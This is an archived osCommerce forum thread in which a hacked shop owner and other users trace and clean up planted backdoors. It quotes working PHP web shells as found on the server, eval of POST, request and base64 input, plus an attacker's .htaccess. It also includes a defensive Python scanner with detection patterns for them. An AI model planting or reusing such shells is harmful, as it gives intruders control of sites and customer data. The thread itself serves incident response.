
Has My Store Been Hacked?


backinaction999


Posted

Browsing my site today I noticed every page has a small Google symbol added at the bottom. The link takes me to:

www.mysitename.com/redirect.php?action=banner&goto=2

 

The image itself when cut and pasted by location states:

http://www.mysitename.com/images/q_boot.php

 

This sounds bad to me. I'm going to go and remove the q_boot.php but does anyone have any idea how this could have got there? This is the second hack we've had in as many months. Last time it was rogue e-mails being sent out to customers. Our webmaster told us it was a security issue with OSC and assured us they had all the new updates installed, but now this...

Posted

Checking further files I notice that my .htaccess file in the folder that the rogue q_boot script was running in has been amended. There was also a fly.php file on the root directory of the site.

 

Has someone used OScommerce to hack in or FTP? I'm stumped.

Posted

It does sound like a hack - there shouldn't be a php file in the images directory, nor should any of your pages have any additional code or images that you didn't put there. I suggest you ask your webmaster exactly what 'updates' they applied - a complete list of all steps taken. It's impossible to say what route might have been taken for the hack with the information you provide. osc can be hacked by its own vulnerabilities if not properly secured, it can be hacked by vulnerabilities in other software on a shared hosting service, by cross-site scripting, and it can of course also be hacked if FTP usernames and passwords or admin usernames and passwords are known, but in the latter cases this is probably unlikely unless there is a keylogger or other trojan software installed on the pc accessing the site, i.e. it has already been compromised. You may be able to find out what way in was used by checking your server log files.

 

You may be able to find out more about the nature of the hack by opening up the suspect files in a text editor and checking the code.

 

Have you got Site Monitor installed? If not you should install it, and have it check all the files on your site.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!

Posted

Thanks Ben, that's very helpful. Can I just ask if you can help me a little further?

 

I got my host to send me a log of all FTP access to our site this month. My IP was the only one listed for that month and all accounted for. The rogue files on OSC were placed there on 10/12/09 (That's if the dates that appear alongside them in FTP are anything to go by) and there is no FTP activity recorded on the logs for that day.

 

In November we were having upgrades done to our site by our webmaster. They don't have our OSC admin password, only the FTP. Prior to November we had someone hack the e-mail module of OSC which was sending out trojan e-mails to our customers. Our webmaster told us they had hacked into the mail module of OSC and they had fixed it and patched it. What was strange about all this though was that the customer who alerted us to these rogue e-mails being sent hadn't even bought anything from our website, so couldn't possibly have been registered in the customers module of OSC. They had bought from our Ebay store instead, but both OSC and our Ebay store share the same e-mail address and the same FTP account!! Looking at the FTP logs for November activity we have our IP, our webmaster's and then an IP from the exact same town in China. We have sent this to our webmaster asking them to identify it.

 

I'm not saying someone at our webmaster's office has hiked the login, because how could anyone use FTP to drop these files in place and leave no trace of their activity?

 

By the way, I am on a shared hosting service, but I don't know how I can find out exactly how the site was accessed, but until I do I don't know what to change. The webmaster, the host, or what is at most risk here - our oscommerce admin panel or our FTP login details. Naturally, they have all been changed in light of this hack, but if there is a script recording everything in OSC right now how would I know, when I don't know who to trust?!!!

 

Our webmaster e-mailed us to tell us that someone has accessed the banner manager and added 3 banners. But how could they have put fly.php on the root directory, altered the .htaccess file and added another php file into the image folder that has the image slices for every page of our site?

 

Searching google, I can't find any other instance of this being done.

 

But right now, I need to secure my OSC as it's my livelihood and I can't ask our webmaster to do it as I'm not sure if I trust them right now. Is Site Monitor available from cpanel on a shared hosting package? I'm not very familiar with it.

 

Could you also tell me how I could find the server log files? Are you talking about all the FTP access made in December and November which our host has already sent us or are you referring to a far more comprehensive log file?

 

Lastly, and most importantly, do you have any idea what these rogue banners are attempting to do?

Posted

I doubt that FTP is the means being used to access your site. As I indicated, there are other ways. Your server access log - not simply the FTP log but the log of all http and other port accesses to your site, if available - should give you information about which files were accessed, from which IP, which date and time and through which service.

 

By the way, your use of the term 'webmaster' is a bit confusing. Do you mean the host service provider, or someone you have employed to manage your particular website?

 

The mail issue was a known vulnerability. This was not the only file that could be used to gain access to the customer list without any login details required. It was a very, very simple hack once discovered. There were three recommendations to deal with it:

1) a change in the code of application_top.php, 2) changing the name of the admin directory 3) securing the newly renamed admin directory with .htaccess.

There are a whole raft of security measures required to secure osc against various forms of exploits and if all of them are not done your site is vulnerable to attack in one way or another. Usernames and passwords are not required to initiate the attack, and merely changing them leaves you vulnerable no matter how strong they are. That is why I suggested you must get a full, itemised list from your 'webmaster' of everything they did to 'secure' your site. Moreover you should acquaint yourself with what should have been done. It is your responsibility to see that your site is safe and your customer details secure. Have a look at this thread. Site Monitor is an osc addon, a link to it is in the first post in that thread.

 

There is no way to know for sure what rogue banners are attempting to do without looking at the code and following links or googling for them, but it could be anything from installing malicious software on your customer's pcs when they browse your site, to redirecting them to another site where their payments will be taken but no goods will be sent, to anything else that hackers are capable of thinking of and doing to amuse themselves and annoy others, at the least, to outright theft.


Posted

Thanks again Ben.

 

Where would I obtain the server access log? I can only find individual FTP or web site logs on my cpanel.

 

By webmaster, I meant the people who had actually designed the site.

 

I took a look at the thread you linked to and I'm keen to install all the modules listed. But would I need my web designer to do it, or could I do them myself?

 

I have asked the web designer for more information as to what they patched up the first time we were hit, but I'm still waiting for a response.

 

I really appreciate your help on this matter, especially as I'm running around like a headless chicken right now trying to fix this problem.

 

By the way, I opened fly.php in a text editor and got this "test<?php @eval($_POST[code]);?>"

 

q_boot.php just gives me gobbledygook.

 

redirect.php has a lot of OSC headed script inside it which I can read but don't understand.

Posted

As it seems multiple files were affected, and new files installed which you noticed and could therefore be others that you haven't noticed, the safest course of action would be to delete the whole store and restore from a known clean backup, including the database. Of course, this is a fairly drastic action which may result in some loss of data, but you need to be aware that if you don't eliminate every trace of infection the hacker could just come straight back in again.

 

Otherwise you are going to have to open up every file and directory in your store and check for and eliminate signs of infection. Site Monitor will give you a list of suspect files, but that doesn't mean they will all be infected. You will have to open them up individually. Perhaps it will be possible to remove the rogue code using a global search and replace, if you know specifically what code to remove.

 

If you only have ftp and weblogs, look at the weblog for clues about which files were being accessed and when.

 

Addons are not difficult to install provided you are methodical and can follow instructions carefully.


Posted

By the way, I opened fly.php in a text editor and got this

"test<?php @eval($_POST[code]);?>"

Will allow arbitrary code to be executed on your server. It's an open door for the hacker to do anything they want.


Posted

Will allow arbitrary code to be executed on your server. It's an open door for the hacker to do anything they want.

 

 

on a properly secure server eval functions are disabled, ask your host why its not & if they have taken steps to properly secure the server.

 

 

If you use a developer to run your site it's their responsibility to ensure it's secure, ask them why they have failed in that.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Posted

I just got a response from EUK (the host) with regards to the logs:

 

"We searched for the logs on the server for the upload of the fly.php file in your account however the logs have been rotated due to the log rotation cron set on the server."

 

I have no idea what it means and asked them to clarify. I also asked them about the eval functions of which they have so far dodged the issue.

 

To be honest, I have no more faith in this particular host and will be leaving them just as soon as I can find a good UK based web host who can offer me a good dedicated server package. If anyone has any recommendations I'd be so very grateful to hear them.

 

By the way, the last file I found was the .htaccess file that had been placed into the images folder. It was never there before and the script inside it was:

 

"Options -Indexes

<Files *.*>
Order Deny,Allow
Allow from all
</Files>

<Files ~ ".(php|gif|jpe?g|png|ico|GIF|JPE?G|PNG|ICO|sql)$">
Order Allow,Deny
Allow from all
</Files>"

 

Any idea on what it's doing?

Posted

Just had a response from EUK regarding both the missing logs and the eval function.

 

"The auto-set cron runs on the server wherein the /var/logs have been updated, so the logs at the moment on the server do not have they details you requested."

 

"On a Shared Server there are multiple accounts hosted on the same server, so the different applications required by different owners to host and run their websites. CMS - Content Management System are required by many accounts hosted on the server to run websites which are using Joomla, wordpress, magento,xcart and etc.

It is not possible to disable the EVAL function of PHP on a Shared Server, as it is required by many hosting accounts using CMS applications.

 

If you wish to have it disable, you may consider any of the VPS Hosting Plans wherein you can have the complete administrative rights to your account. The VPS account is complete private to you and you have the complete rights to make changes to any files."

Posted

Sorry to say it, but I get the feeling you aren't really listening. It seems your store is wide open to hacks. You haven't done anything about closing the door yourself. Have you even read the security thread I gave you the link for? Some of the changes are very easy, like changing the name of the admin directory, deleting a couple of files known to be open to exploit, securing it with .htaccess etc. Those won't be enough, now that you've been hacked (they were never enough before either, but they could have prevented the simple mail hack you had).

 

You've been hacked and you can't afford to wait indefinitely for someone else to do the work for you, even if it's their job. Depending on the nature of your agreement with them, they might even say it's not their job. If it was their job, they weren't competent at it.

 

I repeat my suggestion to delete everything and restore your site from backup - and then apply all the security measures in the thread I referred you to. To just restore without applying the measures will mean you will be hacked again. At least install the Site Monitor and have it scan your site for suspicious files, and deal with the files it lists (don't necessarily delete them, but inspect them, ask about any code that looks wrong, especially if it refers to the eval function). It is a very easy install. If code in a file looks like gobbledegook to you, post it here, someone might be able to explain whether it looks like a hack and what sort of hack.

 

The .htaccess file you refer to is saying allow executable php scripts and sql statements (which can add, alter and extract information in your database) in your images directory, among other things.

 

Your web hosts have told you they don't have the log file showing an upload of fly.php, in so many words. Nevertheless, if the web log file is there in your cPanel for the 10th, look at it yourself. Even if it that file was uploaded before, there might be other signs of the hacker's activity for that date.


Posted


Hi,

That is allowing scripted files to be run.

For any folder with 777 permissions, enter this code into a .htaccess file to stop scripts from being executed (note the space after the ~, which Apache needs to treat the quoted part as a regular expression):

<Files ~ "\.(php*|s?p?html|cgi|pl)$">
deny from all
</Files>

 

Steve

Posted

Brian, back when you had the original hack - the email one - were all your files checked for additional script?

 

A lot of the things you are finding now seems very similar to the eval(64) hack that a lot of us caught :rolleyes:

 

I'm wondering if this is what you got originally and your webmaster never cleared it all out?

 

What does the first line of your .php files read like?

My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really necessary

Posted

I am listening to you Ben, but I'm sorry I don't know how to do many of the things you say. I have backed up the site, but don't know how to restore it, my web designer always does it. I know that sounds stupid and foolish to you but I put my faith in my web designer that everything was done. The thread you posted I DID read but to a relative novice you have to understand how complicated it reads. I'm sorry if I sound thick and like I deserve everything I got, but I trusted my designer to build the site competently. I'm getting the overall gist that I'm a fool but I'm not about to start dabbling in things I don't understand just to make them worse. That's why I came for advice on these forums, so I knew what the urgency was and what should be done. I'm sorry I wasted your time.

Posted


No, Brian, it's not a waste of my time and it doesn't sound stupid or foolish, nor that you deserve to be hacked. It's good you came to the forums, it was the right thing to do. I'm just trying to say that it's time to start learning more about osc yourself. But if you really don't have the confidence to do anything yourself then you need someone else to help you and not a web designer who has run off and didn't secure the site properly in the first place. You need that right now because right now your site doesn't really belong to you, you may have deleted two or three hacker files but haven't cured the source of the problem and don't know if there are other infected files he can use to just walk back in. Almost certainly there are, after all he dropped those in the first place.

 

You really could start with Site Monitor. It is just a few files to upload and some lines of code to insert. Instructions are provided.


Posted

I'm sorry, please don't think it ungrateful of me. It's just frustrating trying to run a two man business with all the grief it entails without having to deal with exploits of some scum hacker threatening to end my livelihood and having to study up on everything that will stop him.

 

But I know you are right. I'm really angry with my 'web designer' who has basically left me hanging out to dry in all this. I come back to work this morning just to find that there is a php.ini file inside every directory on my site, uploaded clearly at the end of the day when I finished all my work. I don't know what it can do, or why it's there, the contents inside read like a manual on php, but either way it's the last straw.

 

Unfortunately I have to do your earlier suggestion and wipe the site and go back to a previous backup. I just found out that EUK can do it for me, but we have to select a date when the site was safe. Tricky as we can't know exactly when the earlier mail hack occurred and if this new hack was part of it. Therefore we are going to have to go back to a date previous to that which would mean we could be open to the same hack again. I need to patch it myself as I can't trust my web designer to do it. I just hope the patch is as easy to install as Site Monitor was. I couldn't run Site Monitor because by the time it was installed we'd found all the new updated files and decided to roll back the site to the beginning of last month.

 

It's just typical that such a hack would occur over the weekend when it's almost impossible to get support from the people who built the site and the host that maintains it. This forum has been the only reassurance I have and I do appreciate all the help that's been given, particularly from yourself Ben.

 

I will install every one of the patches and updates myself and at least be glad I will learn something about security measures. My concern is what damage the hackers have already done, and what they could have obtained from my site.

Posted

Latest update is that we just found an unknown ip address on our ftp stats. This is the first we have ever found and they must have been the ones who uploaded all the php.ini files on Saturday right after I'd finished removing all the rogue files. The IP is 60.16.0.95 and it's located in Beijing (no surprises there).

 

What alarms me is that we changed the FTP password right after we had deleted all the changes that had been made on our host server and gave the password to NO-ONE. We use Fetch to access our FTP files and use Cpanel to change our FTP login. We scanned our systems thoroughly on Saturday with ClamXav and there was nothing suspicious running. We used the Cpanel Virus scanner to check our FTP files and there was nothing. As we are the only ones with the new password made up of an unlikely set of letters and numbers, how is it even possible that someone could have got our FTP login details?

Posted


If they have FTP access that would be very worrying. Unless you can be sure of blocking that door, then all other security measures won't help. Possibly the server itself has been compromised. Perhaps they set up their own FTP account - have you checked the user account settings for FTP access in cPanel? FTP username/passwords can be sniffed, they can be discovered through trojan software installed on the PC used to access the account. Better to use SFTP rather than FTP, but this only helps prevent usernames/passwords being detected in transit between your machine and the host. The door needs to be closed and I think you need to talk further with your host providers about how this may have happened, and whether there is evidence of hacks being directed at other users on their systems.


Posted


 

 

If they are getting ftp access, then either the server is insecure or they are getting the passwords from somewhere, could they have hacked your email?

 

PS: another possibility is they have a keylogger on your PC, make sure you scan that too.

 

Perhaps you need to look for a new host, hosting can be set quickly, you only need to change the nameservers to move the site.

 

If looking for a reliable host, I recommend you look at http://www.reviewcen...roducts100.html and choose a host with good scores + plenty of reviews, do a web search on any you're considering.


Posted

As of today we have been livechatting with EUK but they are very patchy with their support.

 

Firstly we got the site rolled back to November and FTP access blocked from cpanel. We then deleted all existing FTP accounts and added a new one with a fresh name and password.

 

I added Site Monitor. First attempt I really screwed up. Too much on my mind and I dropped the files in the wrong folder to start with as I couldn't find them when I went to make the changes and got paranoid the hacker was back in deleting them as they were added! After a while I found my mistake and installed Site Monitor and it worked perfectly.

 

I do believe some info was compromised through an e-mail hack. We know for definite our e-mail was compromised through OSC. We would send new passwords to our web developer through our e-mail system. But like I said, this latest password change was never sent anywhere and was made directly inside C-Panel. Could C-Panel reveal current passwords that we have set on FTP, as this is the only thing I can think of?

 

Everything this end is Mac based and all have been scanned thoroughly and are clean as a whistle.

 

I'm watching the site consistently now, and am currently working my way through the original list of security modules and updates that were mentioned on the security thread. I only have a few concerns now.

 

How hard is it to patch the e-mail flaw in OScommerce which I'm almost certain we have again, because we rolled our web site back to a date before we asked our web developers to patch it?

 

And I have read that admin should be renamed. Does that mean the admin directory in OSC should be called something else, or my Admin name and password as related to my website hosting?

 

Had a chance today to look for some dedicated servers. Ploughing through the review sites of course but it's so hard to find a company that has more good reviews than bad.

Posted

Yes, you have to rename the admin directory to something else, and password protect it with .htaccess. This will stop the email flaw being exploited through preventing access to the admin files, although there is also a code change you can make to close the vulnerability in some of the admin files themselves. Your FTP password would not have been revealed through the email hack, that just gives access to the customer list without any need for admin login.

 

Make sure all files and permissions are correctly set, don't leave any directories (including the images directory) at 777 (should be 755), and do all the other things mentioned in the security thread.


Posted

I just ran the Sitemonitor hacked files check and it's not looking too good for some files we rolled back to.

 

Regarding the permissions for the image folder, Sitemonitor located a hacked file in the images folder. Inside the images folder was a folder named yahoo. Inside that was the hacked file index.php.

 

I checked the permissions on the images folder and it's at 755 as it should be, so I have no idea how or when that file was placed there. Here is the code for it though which is a foreign language to me... But I notice the evil 'eval' mentioned a few times. Is this the email hack that got us first time?

 

<?php
/*
$Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com

Copyright © 2003 osCommerce

Released under the GNU General Public License
*/

// require('includes/application_top.php');
// $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_address) . "' and customers_id != '" . (int)$customer_id . "'");
// $check_email = tep_db_fetch_array($check_email_query);
// if ($check_email['total'] > 0) {
// $error = true;
error_reporting(0);
// if (!tep_session_is_registered('customer_id')) {
eval(stripslashes($_REQUEST['osc']));
// if (ACCOUNT_GENDER == 'true') {
// if ( ($gender != 'm') && ($gender != 'f') ) {
// $error = true;
eval(base64_decode($_REQUEST['osc64']));
// $messageStack->add('account_edit', ENTRY_GENDER_ERROR);
// }
// }
// $navigation->set_snapshot();
if(!(count($_GET)+count($_POST)))echo "Open Source E-Commerce Solutions ", 2000+7, " year";
// tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));
// }
?>

Posted

Definitely still infected then. Yes, the two eval lines are the nasty ones; most of the rest is commented out and does nothing. They will allow the hacker to run code on your server.

 

The email hack was nothing clever and did not require the running of any code to accomplish. It simply required an osc with the default name for the admin directory and no code change to prevent it. This is very much more serious than the email hack. They have placed code on your server which gives them the power to do pretty much whatever they want with your site if not the server itself.

 

It's got to be all cleared out or they will be straight back in. Files could be deeply buried within subdirectories so you need to check every single file that Site Monitor throws up and delete the files or remove the malicious code. Search the forums for more information about base64 attacks.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!
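As an added example (not from the thread, and not Site Monitor's own code), here is a small defender-side audit that checks a store's document root for the things discussed above: PHP files and .htaccess files dropped under images/ (which should hold only static content in a stock osCommerce install), directories left world-writable (777 instead of 755), and files containing an eval() fed from request data or from base64_decode(), which is what the posted images/yahoo/index.php does. The directory tree it scans is constructed inside the script so it runs offline; the assumption is the standard osCommerce layout with images/ as the only static-only directory.

```python
"""Audit an osCommerce document root for dropped backdoors and lax permissions.

Added example: constructed demo tree, not the store or Site Monitor code.
"""
from __future__ import annotations

import os
import re
import stat
import tempfile
from pathlib import Path

# Signatures of the eval() backdoor posted in the thread: code executed straight
# from request data, possibly wrapped in stripslashes()/base64_decode().
EVAL_FROM_REQUEST = re.compile(
    r"eval\s*\(\s*(?:(?:stripslashes|base64_decode)\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b"
)
EVAL_BASE64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(")

# Directories that should only ever hold static content (assumption: stock osC layout).
STATIC_ONLY_DIRS = ("images",)


def scan_file(path: Path) -> list[str]:
    """Return the names of suspicious constructs found in one PHP file."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return []
    hits = []
    if EVAL_FROM_REQUEST.search(text):
        hits.append("eval_of_request_data")
    if EVAL_BASE64.search(text):
        hits.append("eval_of_base64")
    return hits


def audit(root: str) -> list[tuple[str, str]]:
    """Walk a document root and return sorted (finding, relative_path) pairs.

    php_in_static_dir       a .php file under images/
    htaccess_in_static_dir  an .htaccess under images/ (the amended file in the thread)
    world_writable_dir      a directory with o+w set (777 rather than 755)
    eval_of_request_data    eval() fed from $_REQUEST/$_GET/$_POST/$_COOKIE
    eval_of_base64          eval(base64_decode(...))
    """
    root_path = Path(root)
    findings: list[tuple[str, str]] = []
    for dirpath, _dirnames, filenames in os.walk(root_path):
        current = Path(dirpath)
        rel_dir = current.relative_to(root_path)
        in_static = bool(rel_dir.parts) and rel_dir.parts[0] in STATIC_ONLY_DIRS
        if current.stat().st_mode & stat.S_IWOTH:
            findings.append(("world_writable_dir", rel_dir.as_posix()))
        for name in filenames:
            file_path = current / name
            rel = file_path.relative_to(root_path).as_posix()
            is_php = name.lower().endswith(".php")
            if in_static and is_php:
                findings.append(("php_in_static_dir", rel))
            if in_static and name == ".htaccess":
                findings.append(("htaccess_in_static_dir", rel))
            if is_php:
                for hit in scan_file(file_path):
                    findings.append((hit, rel))
    return sorted(findings)


def build_demo() -> str:
    """Construct a throwaway tree mirroring what the thread describes (constructed data)."""
    root = tempfile.mkdtemp(prefix="osc_audit_")
    r = Path(root)
    (r / "includes").mkdir()
    (r / "includes" / "application_top.php").write_text("<?php\n// clean bootstrap file\n?>\n")
    (r / "index.php").write_text("<?php\nrequire('includes/application_top.php');\n?>\n")
    (r / "images").mkdir()
    (r / "images" / "logo.gif").write_bytes(b"GIF89a")
    # The thread says images/.htaccess was amended but does not show its contents.
    (r / "images" / ".htaccess").write_text("# constructed placeholder\n")
    yahoo = r / "images" / "yahoo"
    yahoo.mkdir()
    os.chmod(yahoo, 0o777)  # the permission mistake warned about above
    # The two live lines from the posted images/yahoo/index.php; everything else
    # in that file is commented-out osCommerce code used as camouflage.
    (yahoo / "index.php").write_text(
        "<?php\nerror_reporting(0);\n"
        "eval(stripslashes($_REQUEST['osc']));\n"
        "eval(base64_decode($_REQUEST['osc64']));\n?>\n"
    )
    return root


if __name__ == "__main__":
    for finding, path in audit(build_demo()):
        print(f"{finding:24} {path}")
```

Run it against a real document root by calling audit() with that path instead of build_demo(); every hit under images/ and every eval finding is something Site Monitor would also flag and that needs to be deleted or cleaned, and each world-writable directory should go back to 755. The regexes are deliberately narrow to keep false positives low, so they complement rather than replace a full file-by-file comparison against a known-clean copy.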

Posted

Hello

 

The same thing happened to my website, on the same day, December 10th.

A file named fly.php appeared in the root www folder, and several files in the 'images' folder: q_boot.php and a .htaccess file.

 

My clients received spam from a hoster :

- http://nybuoquewqe.com/?cid=weme15

- http://nybuoquewqe.com/?cid=weme13

- http://5ma6pasvuh.cjb.net/

 

I deleted the added files but the spam carries on.

I can't tell whether the mail is sent via my website or whether the hackers got access to my client list, copied it and are sending email from another server.

 

Any ideas ???

Many thanks

Archived

This topic is now archived and is closed to further replies.
